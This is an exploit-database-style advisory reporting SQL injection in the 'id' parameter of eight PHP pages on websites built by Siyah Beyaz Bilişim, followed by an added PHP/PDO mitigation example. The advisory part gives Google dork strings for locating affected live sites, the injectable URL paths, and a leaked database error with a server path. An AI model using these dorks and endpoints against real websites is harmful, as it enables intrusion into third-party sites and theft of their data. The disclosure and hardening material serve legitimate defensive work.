#################################################################################################
# Exploit Title : Siyah Beyaz Bilişim Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/11/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Tasarım ve Kodlama Siyah Beyaz Bilişim tarafından yapılmıştır.''
intext:''Tasarım ve Kodlama SiyahBeyazBilişim tarafından yapılmıştır.''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# SQL Injection Exploit :
/yazi.php?id=[SQL Injection]
/resimler.php?id=[SQL Injection]
/sayfa.php?id=[SQL Injection]
/grup.php?id=[SQL Injection]
/haber.php?id=[SQL Injection]
/slider.php?id=[SQL Injection]
/sube.php?id=[SQL Injection]
/duyurular.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Example SQL Database Error :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/adsyb/public_html/yazi.php on line 5
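# Mitigation Example (added here; not code from the advisory or from the vendor) :
The warning above means the query failed and its result was passed unchecked to the legacy mysql_* API. The sketch below shows a hardened lookup for the `id` parameter using integer validation and a PDO prepared statement. The table and column names (`yazilar`, `baslik`) and the function names are hypothetical, and an in-memory SQLite database stands in for the site's MySQL database so the example runs offline.

```php
<?php
// Added example, not the vendor's code. Table/column names are hypothetical;
// in-memory SQLite stands in for the production MySQL database.
declare(strict_types=1);

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE yazilar (id INTEGER PRIMARY KEY, baslik TEXT)');
    $pdo->exec("INSERT INTO yazilar (id, baslik) VALUES (5, 'constructed sample row')");
    return $pdo;
}

// Accept only a positive decimal integer; values such as "5'" are rejected.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {   // arrays from ?id[]=... end up here
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The id is bound as a typed parameter and never concatenated into the SQL text.
function fetch_article(PDO $pdo, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, baslik FROM yazilar WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_demo_db();
foreach (['5', "5'", '5 OR 1=1', '999'] as $raw) {   // constructed inputs
    $row = fetch_article($pdo, $raw);
    echo str_pad($raw, 10), ' => ', $row ? $row['baslik'] : 'not found (respond 404)', PHP_EOL;
}
```

In production, database errors should go to the server log rather than the response, so that file paths like the one in the warning above are not disclosed to visitors.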
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################